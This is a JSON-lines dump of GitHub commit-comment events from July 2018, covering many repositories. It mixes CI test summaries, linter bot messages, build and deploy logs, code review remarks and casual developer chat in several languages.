{"id":"7969194329","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29716867,"position":null,"line":null,"path":null,"commit_id":"ef865eebc8f4094a5ffc57a1965660d585ecc9cf","created_at":"2018-07-16T08:09:38Z","updated_at":"2018-07-16T08:09:38Z","author_association":"NONE","body":"eigen_HBIRE (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (2443 of 2985 tests passed, 54 test warnings)\n\nMessages:\n\n * 71 tests had: ESO small diffs.\n * 573 tests had: EIO diffs.\n * 37 tests had: Table small diffs.\n * 18 tests had: MTR small diffs.\n * 503 tests had: ESO big diffs.\n * 403 tests had: MTR big diffs.\n * 11 tests had: AUD diffs.\n * 506 tests had: Table big diffs.\n * 245 tests had: SSZ big diffs.\n * 300 tests had: ZSZ big diffs.\n * 62 tests had: ERR diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 654\n * Failed: 1\n\nintegration Test Summary\n * Passed: 619\n * Failed: 9\n\nregression Test Summary\n * Passed: 111\n * Failed: 532\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ef865eebc8f4094a5ffc57a1965660d585ecc9cf-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ef865eebc8f4094a5ffc57a1965660d585ecc9cf-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-81.84%25-red.png)</a> \n"}},"created_at":"2018-07-16T08:09:38Z"}
{"id":"7969178082","type":"CommitCommentEvent","actor":{"login":"tkasparek"},"repo":{"name":"spacewalkproject/spacewalk"},"payload":{"comment":{"id":29716831,"position":null,"line":null,"path":null,"commit_id":"ca2c784eaff062b36f5f464affc50c2a2d21fa6a","created_at":"2018-07-16T08:05:25Z","updated_at":"2018-07-16T08:05:25Z","author_association":"MEMBER","body":"We're looking into this issue, so far https://github.com/spacewalkproject/spacewalk/wiki/CertCreation can be used as a workaround."}},"created_at":"2018-07-16T08:05:25Z"}
{"id":"7969176642","type":"CommitCommentEvent","actor":{"login":"kwadrat"},"repo":{"name":"PyConPL/Book"},"payload":{"comment":{"id":29716826,"position":null,"line":null,"path":null,"commit_id":"9c1d1e7f7f512680632fd21de8945bb7bce7cfd7","created_at":"2018-07-16T08:05:05Z","updated_at":"2018-07-16T08:05:05Z","author_association":"MEMBER","body":"Zmieniłem nazwę pliku źródłowego i przeniosłem go do osobnego katalogu - taka konwencja jest potrzebna dla kompilacji przez LaTeX.\r\nPozdrawiam, Piotr Kasprzyk"}},"created_at":"2018-07-16T08:05:05Z"}
{"id":"7969194998","type":"CommitCommentEvent","actor":{"login":"Alej0hio"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29716868,"position":null,"line":null,"path":null,"commit_id":"f4fd0272eaafabd706b2b9b96897493397d5a831","created_at":"2018-07-16T08:09:49Z","updated_at":"2018-07-16T08:09:49Z","author_association":"NONE","body":"cool thing @dhtdht020 "}},"created_at":"2018-07-16T08:09:49Z"}
{"id":"7969195168","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29716869,"position":null,"line":null,"path":null,"commit_id":"3dbc6fce3df70a7bd416264b373e4bf0c2a9c3d7","created_at":"2018-07-16T08:09:51Z","updated_at":"2018-07-16T08:09:51Z","author_association":"CONTRIBUTOR","body":"You shouldn't have to add another onVoteChange.\r\nYou should have just modified voteForProposalToken and voteForProposalGauge to set hasChanged to true."}},"created_at":"2018-07-16T08:09:51Z"}
{"id":"7969197185","type":"CommitCommentEvent","actor":{"login":"rodebiet"},"repo":{"name":"Haivision/srt"},"payload":{"comment":{"id":29716875,"position":null,"line":null,"path":null,"commit_id":"72dd42469f560e7826c76f94f2ef7815348de5e2","created_at":"2018-07-16T08:10:22Z","updated_at":"2018-07-16T08:10:22Z","author_association":"NONE","body":"[ 47%] Building CXX object CMakeFiles/srt_virtual.dir/srtcore/epoll.cpp.o\r\n/tmp/workdir/srt/srtcore/epoll.cpp:54:13: fatal error: sys/epoll.h: No such file or directory\r\n    #include <sys/epoll.h>\r\n             ^~~~~~~~~~~~~\r\n"}},"created_at":"2018-07-16T08:10:22Z"}
{"id":"7969197453","type":"CommitCommentEvent","actor":{"login":"dhtdht020"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29716876,"position":null,"line":null,"path":null,"commit_id":"f4fd0272eaafabd706b2b9b96897493397d5a831","created_at":"2018-07-16T08:10:26Z","updated_at":"2018-07-16T08:10:26Z","author_association":"CONTRIBUTOR","body":"what is wrong with you all?"}},"created_at":"2018-07-16T08:10:26Z"}
{"id":"7969199605","type":"CommitCommentEvent","actor":{"login":"caution3"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29716879,"position":null,"line":null,"path":null,"commit_id":"f4fd0272eaafabd706b2b9b96897493397d5a831","created_at":"2018-07-16T08:10:58Z","updated_at":"2018-07-16T08:10:58Z","author_association":"MEMBER","body":"I’m gonna lock this certain thread just in case, even though there was no “drama”, it will be locked as a just in case basis. Thanks!"}},"created_at":"2018-07-16T08:10:58Z"}
{"id":"7969199812","type":"CommitCommentEvent","actor":{"login":"rasmusolle"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29716880,"position":null,"line":null,"path":null,"commit_id":"f4fd0272eaafabd706b2b9b96897493397d5a831","created_at":"2018-07-16T08:11:01Z","updated_at":"2018-07-16T08:11:01Z","author_association":"NONE","body":"lots of stuff, actually."}},"created_at":"2018-07-16T08:11:01Z"}
{"id":"7969202007","type":"CommitCommentEvent","actor":{"login":"paparoup"},"repo":{"name":"spacewalkproject/spacewalk"},"payload":{"comment":{"id":29716888,"position":null,"line":null,"path":null,"commit_id":"ca2c784eaff062b36f5f464affc50c2a2d21fa6a","created_at":"2018-07-16T08:11:31Z","updated_at":"2018-07-16T08:11:31Z","author_association":"NONE","body":"Thank you for the workaround"}},"created_at":"2018-07-16T08:11:31Z"}
{"id":"7969203164","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"nss-dev/nss"},"payload":{"comment":{"id":29716891,"position":null,"line":null,"path":null,"commit_id":"d58a7f41131b5ea68d203b5e6600885e09dad173","created_at":"2018-07-16T08:11:47Z","updated_at":"2018-07-16T08:11:47Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/github/v1/taskcluster-github-config.json#\nErrors:\n  * data should NOT have additional properties: \"scopes\"\n  * data.metadata.source should be string\n\n</details>"}},"created_at":"2018-07-16T08:11:47Z"}
{"id":"7969204870","type":"CommitCommentEvent","actor":{"login":"FauziAmth"},"repo":{"name":"google/ExoPlayer"},"payload":{"comment":{"id":29716892,"position":null,"line":null,"path":null,"commit_id":"18d208ab937e274da4974fad7b8601d35179e486","created_at":"2018-07-16T08:12:13Z","updated_at":"2018-07-16T08:12:13Z","author_association":"NONE","body":"@ojw28 yap.. i have found another way to make this work.. thank you for this fix...."}},"created_at":"2018-07-16T08:12:13Z"}
{"id":"7969206891","type":"CommitCommentEvent","actor":{"login":"manstis"},"repo":{"name":"kiegroup/kie-soup"},"payload":{"comment":{"id":29716894,"position":41,"line":172,"path":"kie-soup-maven-utils/kie-soup-maven-integration/src/main/java/org/appformer/maven/integration/MavenRepository.java","commit_id":"7d483fdc0cd463791de34978ae8517a2ea3cfc21","created_at":"2018-07-16T08:12:42Z","updated_at":"2018-07-16T08:12:42Z","author_association":"MEMBER","body":"None of my business, but this probably wanted to do ```if( isSnapshot ) {...```"}},"created_at":"2018-07-16T08:12:42Z"}
{"id":"7969207243","type":"CommitCommentEvent","actor":{"login":"capricorn2001"},"repo":{"name":"vantu5z/RHVoice-dictionary"},"payload":{"comment":{"id":29716896,"position":null,"line":null,"path":null,"commit_id":"2b61685d20df4491aa0c1cc6d511777859c70b75","created_at":"2018-07-16T08:12:48Z","updated_at":"2018-07-16T08:12:48Z","author_association":"COLLABORATOR","body":"Добавил точку после закрывающей скобки в конце строки - иначе заголовки, заканчивающиеся скобкой, читаются слитно со следующей строкой. Соответственно скорректировал `test_templates.py`. Если будут возражения, верну."}},"created_at":"2018-07-16T08:12:48Z"}
{"id":"7969213570","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29716909,"position":null,"line":null,"path":null,"commit_id":"ef865eebc8f4094a5ffc57a1965660d585ecc9cf","created_at":"2018-07-16T08:14:20Z","updated_at":"2018-07-16T08:14:20Z","author_association":"NONE","body":"eigen_HBIRE (mbadams5) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ef865eebc8f4094a5ffc57a1965660d585ecc9cf-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-16T08:14:20Z"}
{"id":"7969215231","type":"CommitCommentEvent","actor":{"login":"dreampiggy"},"repo":{"name":"rs/SDWebImage"},"payload":{"comment":{"id":29716916,"position":null,"line":null,"path":null,"commit_id":"d2dc4cbbac3b141f9f74cadab293696593dfa680","created_at":"2018-07-16T08:14:44Z","updated_at":"2018-07-16T08:14:44Z","author_association":"COLLABORATOR","body":"@wangning-lingli Seems a histroical reason.\r\n\r\nBut SDWebImage 5.x support custom `NSFileManager` instance to be used for cache. And you can set a delegate for that. So maybe we can still keep current design that use a `init` stand-alone `NSFileManager` to this.\r\n\r\nDo you have any reason that want to use `sharedManager` for this ?"}},"created_at":"2018-07-16T08:14:44Z"}
{"id":"7969217135","type":"CommitCommentEvent","actor":{"login":"varun19299"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":29716921,"position":null,"line":null,"path":null,"commit_id":"cddf9415564b16c2bc234df68d3eb44fc8689dae","created_at":"2018-07-16T08:15:12Z","updated_at":"2018-07-16T08:15:12Z","author_association":"NONE","body":"Is this committed to the older tf versions (1.7+)?\r\n\r\nSeems like only a 1.9+ commit."}},"created_at":"2018-07-16T08:15:12Z"}
{"id":"7969217558","type":"CommitCommentEvent","actor":{"login":"lerdem"},"repo":{"name":"DmytroKaminskiy/quiz_generator"},"payload":{"comment":{"id":29716922,"position":5,"line":24,"path":"app/blueprints/account/forms.py","commit_id":"549836b96d09d1656597a11621fca9b5e38a5141","created_at":"2018-07-16T08:15:18Z","updated_at":"2018-07-16T08:15:18Z","author_association":"CONTRIBUTOR","body":"Why you do not use select((exists(users_query.statement),))?"}},"created_at":"2018-07-16T08:15:18Z"}
{"id":"7969224677","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29716934,"position":null,"line":null,"path":null,"commit_id":"2515e5c18d5bc43f051408a0a2b1359f13ed596c","created_at":"2018-07-16T08:17:00Z","updated_at":"2018-07-16T08:17:00Z","author_association":"NONE","body":"### Results for event id: 5f38c334-0780-4e7c-8980-84a96465f3fa\n<details><summary>DockerServerless : Deploy to Lambda (eea752) Execution completed.</summary>\n<p>\n\n**output tail (340 lines total):**\n\n```\n...\n\n\u001b[1m\u001b[33mWARNING in /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js\nModule not found: Error: Can't resolve 'mv' in '/usr/workspace/clone/node_modules/bunyan/lib'\n @ /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js 100:13-31\n @ ./src/index.js\u001b[39m\u001b[22m\n\n\u001b[1m\u001b[33mWARNING in /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js\nModule not found: Error: Can't resolve 'safe-json-stringify' in '/usr/workspace/clone/node_modules/bunyan/lib'\n @ /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js 90:28-58\n @ ./src/index.js\u001b[39m\u001b[22m\nServerless: Packaging service...\nsample-http/\nsample-http/sample-http.zip\nsample-http/serverless-state.json\nsample-http/cloudformation-template-update-stack.json\nDone in 15.06s.\nrelease package created, uploading to s3://gtmstorage4/releases/sample-http\nCompleted 256.0 KiB/873.4 KiB (540.3 KiB/s) with 1 file(s) remaining\rCompleted 512.0 KiB/873.4 KiB (827.1 KiB/s) with 1 file(s) remaining\rCompleted 768.0 KiB/873.4 KiB (1.1 MiB/s) with 1 file(s) remaining  \rCompleted 873.4 KiB/873.4 KiB (865.2 KiB/s) with 1 file(s) remaining\rupload: ../../output/packages/sample-http-0.0.1.tar.gz to s3://gtmstorage4/releases/sample-http/sample-http-0.0.1.tar.gz\nrelease upload completed!\nApiGateway Endpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/master/sample-http\nSuccess:  sample-http\nALL DEPLOYS SUCCESSFUL\n>>> packaging deployment output: 5f38c334-0780-4e7c-8980-84a96465f3fa-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/5f38c334-0780-4e7c-8980-84a96465f3fa-output.tar.gz\n{\n    \"ETag\": \"\\\"0da0ea91173ae7083fe728cca82bf873\\\"\"\n}\nExecution time was 137 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-16T08:17:00Z"}
{"id":"7969238743","type":"CommitCommentEvent","actor":{"login":"minthuaung000370"},"repo":{"name":"minthuaung000370/minthuaung000370.github.io"},"payload":{"comment":{"id":29716949,"position":null,"line":null,"path":null,"commit_id":"4270033a7c42e312c42e4db469121d5fcc3038d7","created_at":"2018-07-16T08:20:20Z","updated_at":"2018-07-16T08:20:20Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-16T08:20:20Z"}
{"id":"7969239111","type":"CommitCommentEvent","actor":{"login":"ddongule"},"repo":{"name":"ddongule/10minutes2pandas"},"payload":{"comment":{"id":29716950,"position":null,"line":null,"path":null,"commit_id":"a430c8e293fc07bef43278d4c3e1c9f0f8c106c1","created_at":"2018-07-16T08:20:26Z","updated_at":"2018-07-16T08:20:26Z","author_association":"OWNER","body":"다른분들께 다 지워졌네요 ^^;;; 무슨일이람;;;; ㅠ ㅠ ㅠ ㅠ ㅠ @corazzon 도와주세요 ㅠ ㅠ "}},"created_at":"2018-07-16T08:20:26Z"}
{"id":"7969241222","type":"CommitCommentEvent","actor":{"login":"HonestyXu"},"repo":{"name":"chegel/OpenCV-3.4.0-windows-x64"},"payload":{"comment":{"id":29716955,"position":null,"line":null,"path":null,"commit_id":"aadfb36a2d11876860aa71267ae7d7943b2873aa","created_at":"2018-07-16T08:20:57Z","updated_at":"2018-07-16T08:20:57Z","author_association":"NONE","body":"Sorry to bother! I Downloaded your this contrib and add it to intellij Idea, but when I run, it tells me that \"opencv_java340.dll: Can't find dependent libraries\". I haved tried servel times but don't sovled this problem, could you tell me some more details? Thank you very much.  "}},"created_at":"2018-07-16T08:20:57Z"}
{"id":"7969244378","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29716961,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"d86ffadbf3e48b5061a9a6041031ad7a2a47243e","created_at":"2018-07-16T08:21:42Z","updated_at":"2018-07-16T08:21:42Z","author_association":"NONE","body":"unconvert: could not import github.com/disiqueira/ultraslackbot/pkg/command/chucknorris (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/chucknorris\" in any of:"}},"created_at":"2018-07-16T08:21:42Z"}
{"id":"7969244387","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29716962,"position":6,"line":null,"path":"pkg/command/chucknorris/chucknorris.go","commit_id":"d86ffadbf3e48b5061a9a6041031ad7a2a47243e","created_at":"2018-07-16T08:21:42Z","updated_at":"2018-07-16T08:21:42Z","author_association":"NONE","body":"unconvert: could not import github.com/disiqueira/ultraslackbot/pkg/command (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command\" in any of:"}},"created_at":"2018-07-16T08:21:42Z"}
{"id":"7969244405","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29716963,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"d86ffadbf3e48b5061a9a6041031ad7a2a47243e","created_at":"2018-07-16T08:21:42Z","updated_at":"2018-07-16T08:21:42Z","author_association":"NONE","body":"go vet: cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/chucknorris\" in any of:"}},"created_at":"2018-07-16T08:21:42Z"}
{"id":"7969244423","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29716964,"position":24,"line":null,"path":"pkg/command/chucknorris/chucknorris.go","commit_id":"d86ffadbf3e48b5061a9a6041031ad7a2a47243e","created_at":"2018-07-16T08:21:43Z","updated_at":"2018-07-16T08:21:43Z","author_association":"NONE","body":"golint: exported function NewChuckNorrisFactCommand should have comment or be unexported"}},"created_at":"2018-07-16T08:21:43Z"}
{"id":"7969244442","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29716965,"position":6,"line":null,"path":"pkg/command/chucknorris/chucknorris.go","commit_id":"d86ffadbf3e48b5061a9a6041031ad7a2a47243e","created_at":"2018-07-16T08:21:43Z","updated_at":"2018-07-16T08:21:43Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/pkg/command (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command\" in any of:"}},"created_at":"2018-07-16T08:21:43Z"}
{"id":"7969244463","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29716966,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"d86ffadbf3e48b5061a9a6041031ad7a2a47243e","created_at":"2018-07-16T08:21:43Z","updated_at":"2018-07-16T08:21:43Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/pkg/command/chucknorris (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/chucknorris\" in any of:"}},"created_at":"2018-07-16T08:21:43Z"}
{"id":"7969246031","type":"CommitCommentEvent","actor":{"login":"OlaJohn-Ajiboye"},"repo":{"name":"OlaJohn-Ajiboye/Erply-Vue-SHOP"},"payload":{"comment":{"id":29716971,"position":null,"line":null,"path":null,"commit_id":"dfae304f50217e8211bbf5886ad2ba6dbd86134e","created_at":"2018-07-16T08:22:08Z","updated_at":"2018-07-16T08:22:08Z","author_association":"OWNER","body":"I have included a Progressive image Rendering on v-lazy-image. Image loads as you scroll down. Page load speed has bee increased 4x. Hurray!\r\n\r\nVLazyImage component  by --Alex Jover Morales"}},"created_at":"2018-07-16T08:22:08Z"}
{"id":"7969246738","type":"CommitCommentEvent","actor":{"login":"maxdavidson"},"repo":{"name":"oBusk/typescript-library-boilerplate"},"payload":{"comment":{"id":29716973,"position":null,"line":null,"path":null,"commit_id":"6c9ae10842438e889160a278940918c1c5de8a04","created_at":"2018-07-16T08:22:18Z","updated_at":"2018-07-16T08:22:18Z","author_association":"NONE","body":"No worries, I suspected that was the case. Thanks for responding so quickly! \r\n\r\nThis repo was just a place for me to collect some ideas I had when trying to figure out a decent TypeScript workflow some time ago. I haven't really paid much attention to it since, hence some things being outdated. Here's a slightly more recent example of this in practice: https://github.com/maxdavidson/structly.\r\n\r\nYou don't need to credit me when you're using this as a starting point for your own project, since that's the point of this after all. It's just that when the project is empty like this, all the focus is on the boilerplate rather than your own content.\r\n\r\nTrevlig sommar! 🏝"}},"created_at":"2018-07-16T08:22:18Z"}
{"id":"7969251812","type":"CommitCommentEvent","actor":{"login":"paparoup"},"repo":{"name":"spacewalkproject/spacewalk"},"payload":{"comment":{"id":29716983,"position":null,"line":null,"path":null,"commit_id":"ca2c784eaff062b36f5f464affc50c2a2d21fa6a","created_at":"2018-07-16T08:23:30Z","updated_at":"2018-07-16T08:23:30Z","author_association":"NONE","body":"Hi and sorry for the inconvenience,\n\n\nThis workaround is only for private non redhat channels because the guide states:\n\n\n\"For Red Hat supported channels, the certificiate is encryped with Red Hat's security GPG key. It is possible to create your own GPG key and certificate for private non Red Hat channels\"\n\nAnd if yes what happens with the official repositories?\n\nThanks for the time and patience\nZois\n________________________________\nFrom: Tomáš Kašpárek <notifications@github.com>\nSent: Monday, July 16, 2018 11:05 AM\nTo: spacewalkproject/spacewalk\nCc: paparoup; Comment\nSubject: Re: [spacewalkproject/spacewalk] Update default Spacewalk entitlement certificate (ca2c784)\n\n\nWe're looking into this issue, so far https://github.com/spacewalkproject/spacewalk/wiki/CertCreation can be used as a workaround.\n\n[https://avatars0.githubusercontent.com/u/6648455?s=400&v=4]<https://github.com/spacewalkproject/spacewalk/wiki/CertCreation>\n\nCertCreation · spacewalkproject/spacewalk Wiki · GitHub<https://github.com/spacewalkproject/spacewalk/wiki/CertCreation>\ngithub.com\nGitHub is where people build software. More than 28 million people use GitHub to discover, fork, and contribute to over 85 million projects.\n\n\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub<https://github.com/spacewalkproject/spacewalk/commit/ca2c784eaff062b36f5f464affc50c2a2d21fa6a#commitcomment-29716831>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AS3FYn2EnRBXMN3EGhXZEnjj5XRVXNIzks5uHElJgaJpZM4VQrFw>.\n"}},"created_at":"2018-07-16T08:23:30Z"}
{"id":"7969284081","type":"CommitCommentEvent","actor":{"login":"ishanshan"},"repo":{"name":"ishanshan/EnjoySwingDancing"},"payload":{"comment":{"id":29717055,"position":null,"line":null,"path":null,"commit_id":"11f3dd439328da88e02579fb3633b469bb85e25d","created_at":"2018-07-16T08:30:56Z","updated_at":"2018-07-16T08:30:56Z","author_association":"OWNER","body":"哈哈，想到就随时增补优化嘛，毕竟本是写给自己的教程，自己也会翻看"}},"created_at":"2018-07-16T08:30:56Z"}
{"id":"7969285761","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29717061,"position":null,"line":null,"path":null,"commit_id":"3c01149ff3261e99e43994fc503d1bafb4b9b952","created_at":"2018-07-16T08:31:18Z","updated_at":"2018-07-16T08:31:18Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-location](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-location).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-location-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-16T08:31:18Z"}
{"id":"7969287248","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"nss-dev/nss"},"payload":{"comment":{"id":29717064,"position":null,"line":null,"path":null,"commit_id":"3115916936517326ded46554fc34c094c164fb7c","created_at":"2018-07-16T08:31:39Z","updated_at":"2018-07-16T08:31:39Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/github/v1/taskcluster-github-config.json#\nErrors:\n  * data should NOT have additional properties: \"scopes\"\n  * data.metadata.source should be string\n\n</details>"}},"created_at":"2018-07-16T08:31:39Z"}
{"id":"7969289218","type":"CommitCommentEvent","actor":{"login":"tkasparek"},"repo":{"name":"spacewalkproject/spacewalk"},"payload":{"comment":{"id":29717067,"position":null,"line":null,"path":null,"commit_id":"ca2c784eaff062b36f5f464affc50c2a2d21fa6a","created_at":"2018-07-16T08:32:08Z","updated_at":"2018-07-16T08:32:08Z","author_association":"MEMBER","body":"Hello,\r\n\r\nI might have not understood your question properly, do you have any Red Hat content in your entitlement certificate?"}},"created_at":"2018-07-16T08:32:08Z"}
{"id":"7969289833","type":"CommitCommentEvent","actor":{"login":"monowar84"},"repo":{"name":"KatesGitAccount/planets"},"payload":{"comment":{"id":29717070,"position":1,"line":1,"path":"mingaling","commit_id":"7b9ffb44cc3a2013406db93e23f05714b4150f35","created_at":"2018-07-16T08:32:16Z","updated_at":"2018-07-16T08:32:16Z","author_association":"COLLABORATOR","body":"IS it Kate?"}},"created_at":"2018-07-16T08:32:16Z"}
{"id":"7969290553","type":"CommitCommentEvent","actor":{"login":"wannengdek"},"repo":{"name":"tugenhua0707/echars-sunburst-demo"},"payload":{"comment":{"id":29717072,"position":null,"line":null,"path":null,"commit_id":"5939bffceecadc8bb70bb8a5d1979105fa72a4e4","created_at":"2018-07-16T08:32:27Z","updated_at":"2018-07-16T08:32:27Z","author_association":"NONE","body":"你好，我想请教一下，如何学习做“echars-sunburst-demo”中index3.html，中的图表呢？\r\n"}},"created_at":"2018-07-16T08:32:27Z"}
{"id":"7969290631","type":"CommitCommentEvent","actor":{"login":"gsmet"},"repo":{"name":"johncarl81/asciidoclet"},"payload":{"comment":{"id":29717073,"position":12,"line":148,"path":"pom.xml","commit_id":"1bdcdaf5a7ce8b9e42bbc008cb7b29e833d28961","created_at":"2018-07-16T08:32:28Z","updated_at":"2018-07-16T08:32:28Z","author_association":"NONE","body":"Wondering if instead of a regexp, we should use an Ant path matcher similar to https://github.com/azagniotov/ant-style-path-matcher (this one is MIT licensed and just two classes)?\r\n\r\nIt's often used for exclude/include options."}},"created_at":"2018-07-16T08:32:28Z"}
{"id":"7969297757","type":"CommitCommentEvent","actor":{"login":"monowar84"},"repo":{"name":"KatesGitAccount/planets"},"payload":{"comment":{"id":29717085,"position":5,"line":5,"path":".gitignore","commit_id":"de203bcfa08365e72df0a3d398105b383e454ef2","created_at":"2018-07-16T08:34:12Z","updated_at":"2018-07-16T08:34:12Z","author_association":"COLLABORATOR","body":"Here is the comment from Monowar Hossain. Could you see it?"}},"created_at":"2018-07-16T08:34:12Z"}
{"id":"7969301262","type":"CommitCommentEvent","actor":{"login":"Shade-"},"repo":{"name":"mybb/mybb"},"payload":{"comment":{"id":29717093,"position":11,"line":20,"path":"inc/views/base/layouts/master.twig","commit_id":"f2910425b6dfbb16c42a819a6863f658363571c9","created_at":"2018-07-16T08:35:00Z","updated_at":"2018-07-16T08:35:00Z","author_association":"CONTRIBUTOR","body":"What CSS refs can I use in the meantime to fix #3294?"}},"created_at":"2018-07-16T08:35:00Z"}
{"id":"7969302034","type":"CommitCommentEvent","actor":{"login":"electricmonk"},"repo":{"name":"orbs-network/orbs-network-go"},"payload":{"comment":{"id":29717095,"position":23,"line":23,"path":"services/transactionpool/test/add.go","commit_id":"b9ce4b9c6dfcf000e3cf73ee38163629ffcaff02","created_at":"2018-07-16T08:35:12Z","updated_at":"2018-07-16T08:35:12Z","author_association":"NONE","body":"let's try to avoid `BeforeEach` statements, preferring to initialize the SUT via a factory function in the `var` clause"}},"created_at":"2018-07-16T08:35:12Z"}
{"id":"7969309397","type":"CommitCommentEvent","actor":{"login":"ApfelTV"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29717113,"position":null,"line":null,"path":null,"commit_id":"5deb0b0acd4940134a4aabd47457cf40e5f02513","created_at":"2018-07-16T08:36:56Z","updated_at":"2018-07-16T08:36:56Z","author_association":"NONE","body":"thats a huge change of code"}},"created_at":"2018-07-16T08:36:56Z"}
{"id":"7969312139","type":"CommitCommentEvent","actor":{"login":"disenQF"},"repo":{"name":"xaDisenPro/ArtApp"},"payload":{"comment":{"id":29717120,"position":5,"line":5,"path":"wu.py","commit_id":"53a3a0835b749e2e3f45642eb0d7d4b68062f984","created_at":"2018-07-16T08:37:34Z","updated_at":"2018-07-16T08:37:34Z","author_association":"CONTRIBUTOR","body":"使用datetime.now()比较好"}},"created_at":"2018-07-16T08:37:34Z"}
{"id":"7969312237","type":"CommitCommentEvent","actor":{"login":"dhtdht020"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29717121,"position":null,"line":null,"path":null,"commit_id":"5deb0b0acd4940134a4aabd47457cf40e5f02513","created_at":"2018-07-16T08:37:35Z","updated_at":"2018-07-16T08:37:35Z","author_association":"CONTRIBUTOR","body":"overall improvements for you."}},"created_at":"2018-07-16T08:37:35Z"}
{"id":"7969314352","type":"CommitCommentEvent","actor":{"login":"ApfelTV"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29717124,"position":null,"line":null,"path":null,"commit_id":"5deb0b0acd4940134a4aabd47457cf40e5f02513","created_at":"2018-07-16T08:38:04Z","updated_at":"2018-07-16T08:38:04Z","author_association":"NONE","body":"thanks owo\r\n"}},"created_at":"2018-07-16T08:38:04Z"}
{"id":"7969315411","type":"CommitCommentEvent","actor":{"login":"dhtdht020"},"repo":{"name":"OpenShopChannel/ShopChannel"},"payload":{"comment":{"id":29717127,"position":null,"line":null,"path":null,"commit_id":"5deb0b0acd4940134a4aabd47457cf40e5f02513","created_at":"2018-07-16T08:38:18Z","updated_at":"2018-07-16T08:38:18Z","author_association":"CONTRIBUTOR","body":"Uwu"}},"created_at":"2018-07-16T08:38:18Z"}
